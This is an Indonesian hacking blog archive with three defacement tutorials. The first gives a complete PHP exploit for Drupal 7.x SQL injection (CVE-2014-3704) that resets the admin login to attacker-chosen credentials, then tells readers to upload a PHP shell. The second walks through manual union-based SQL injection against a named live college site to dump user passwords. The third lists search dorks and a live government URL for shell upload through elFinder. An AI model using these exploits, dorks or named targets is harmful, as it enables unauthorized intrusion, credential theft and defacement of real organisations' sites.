/Fell Ganns: September 2019

Kamis, 12 September 2019

Deface Metode Drupal 7.x Sql Injection + Upload Shell

Hi Gan Welcome Back :v
Kali Nih Adalah Tutorial Site Yg Menggunakan Cms
Drupal 7.x Sql Injection + Upload Shell
Yg Di Butuhkan
- Shell C99
- Dork
- Kopi
Dork : intext:"powered by drupal" site:id
inurl: Powered by Drupal
inurl:"node/add/article" site:id
( Kembangin Lagi )
Kalian Bisa Comot Drupal Di bawah nih Terus Kalian save ( php ) upload di lolcahost Kalian atau Upload Di Web Yg Kalian Upload shell
Comot bro .
<?php ?> <!Doctype HTML>
<html>
<head>
<title>Drupal Exploit by ./Fell Ganns</title>
<body>
</head>
<body>
<div class="mymargin">
<center>
<font color="red"><h1>Drupal Exploit Sql Injection + Upload Shell by ./Fell Ganns</h1></font>

<form method="GET" action="">
Site : <input type="text" name="url" placeholder="Example: www.site.com">
<input type="submit" name="submit" value="suck it !">
</form>
<br>
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin DГrr #
# Software Link: http://www.drupal.com/ #
# Version: Drupal core 7.x versions prior to 7.32 #
# CVE: CVE-2014-3704 #
#-----------------------------------------------------------------------------#
$file = fopen("rock-you.txt", "a");
error_reporting(0);
if (isset($_GET['submit'])) {
$url = "http://" . $_GET['url'];
$post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
$params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
echo "<h4>Scanning at \"/user/login/</h4>\"";
if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
$fp = fopen("rock-you.txt", 'a');
echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
fwrite($fp, "
");
fwrite($fp, "======================================Donnazmi==============================================================");
fwrite($fp, "
");
fclose($fp);
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
}
}
if (isset($_GET['submit'])) {
$url = "http://" . $_GET['url'] . "/";
$post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
echo "<h4>Scanning at \"Index</h4>\"";
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
$fp = fopen("rock-you.txt", 'a');
echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
echo '<font color="red">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
fwrite($fp, "
");
fwrite($fp, "======================================Donnazmi==============================================================");
fwrite($fp, "
");
fclose($fp);
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
}
}
?>
<br>
</div>

</body>
</html>

Kalian Buka Kira Kira Kalo Vuln Bikin
Tinggal Kalian Klik Web nya https://kntl.com/user/login
terus Kalian Login username ny : fuckyou
Password ny : admin

Nah Kalau Sudah Login ke https://kntl.com/node/add/article
Dan Pilih php Lalu Save

Duarr MemeQ Nah Bisa Kalian Apakan Saja Bebas Just Have Fun 😁
Oke Cukup sekian Bay
Next To 😀

Minggu, 08 September 2019

Deface Metode Sql Injection ( Manual )

Hi Asalamualaikum Wr.Wb
Welcome Back Babi :v Kali Nih Ada Tutorial Deface Metode Sql Injection ( Manual ) Oke Gass Saja Udah Malem Mau Tidur :v
- Dork
- Roko
- Kopi
Dork : inurl:news.php?id= site:
inurl:gallery.php?id= site:
inurl:index.php?id= site:
( Kembangin Lagi )
Live Target : http://www.maldacollege.ac.in/current-news.php?id=35

Mula Mula Kasih Tanda ' di belakang Nya seperti Ni
http://www.maldacollege.ac.in/current-news.php?id=35'

Cari Sampai Eror Gan :v
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+1-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+2-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+3-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+4-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+5-- <- Eror

Berarti database nya 4 gan
Cara Selanjut nya union+select
http://www.maldacollege.ac.in/current-news.php?id=35+union+select1,2,3,4--

Nah Habis itu @@version atau version() buat liat versi berapa sql nya

Angka Togel Nya 5 rebu gan :v Oke Lanjut tod
Habis itu group_concat(table_name) di angka muncul tadi dan

perintah +from+information_schema.tables+where+table_schema=database()--

di akhir angka jadi macam nih
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

Oke Lanjut Muncul Table Banyak Di Situ :v tahap selanjutnya mengekstrak kata2 yang mau di dump database nya di sini gw mau dump user_details setelah di etrax decimalnya adalah 757365725f64657461696c73
Bingung Cara Extrax Nya di sini http://string-functions.com/string-hex.aspx

Nah Oke Lanjut Sekarang group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin

from+information_schema.columns+where+table_name=0xhasil luextra tadi--

jangan lupa mengugunakan 0x << itu
+from+nameyang tadi di dumb-- <- Yang di akhir angka jadi seperti itu

http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--
Keluar dah Babi Username Sama Password Nya Tinggal Kalian Hash Sendiri Login ? Di Itu keliatan hehe
Oke Bay Sekian Dulu
Good Bay Next To 😁

Kamis, 05 September 2019

Bug Website Pada Gojek.com

Hi Gan Kembali Lagi ea

Kali Nih Adalah Bug Website Pada Website Transportasi Terbesar di Indonesia ya itu ( gojek.com )

Bug Nih Cukup Berbahaya Kemungkin Para Attacker Bisa Meng Upload File Mereka Atau Pun Shell Mereka

Bug Website GoJek

#- Title: Bug Website GoJek

#- Author: Tidak dipastikan

#- Published : 7-7-2018

#- Developer : Team Go-Jek

#- Fixed in Version : -

#- Tested on : windows

========================================================================

Proof Of Concept

Gojek Memiliki Bug Ke Amanan Pada Website Nya

Ya itu Bug Elfinder 2.0 - FileManager for web ( rc1 ) File Upload Vurlnerbility
.php .html .phtml .jpg .gif.

Cukup Besar Bug Nya Yah

Ternyata Benar saja Di sini Kita Bisa Upload File Kita

Sama Seperti Deface Metode Elfinder v 2.0 Upload Shell
inurl:/elfinder/elfinder.php.html
inurl:/elfinder v 2.0 ext:phtml
inurl:/elfinder/files/
( Kembangin Lagi )
Exploit :
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html http://site.com/[path]/elfinder/src/elfinder-src.php.html
Live Target : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder.phtml

Di situ kalian Upload File ? Atau Pun shell kalian Terserah Bebas hehe
Oke Lah Cukup Sekian
Bayy Next To 😁

/Fell Ganns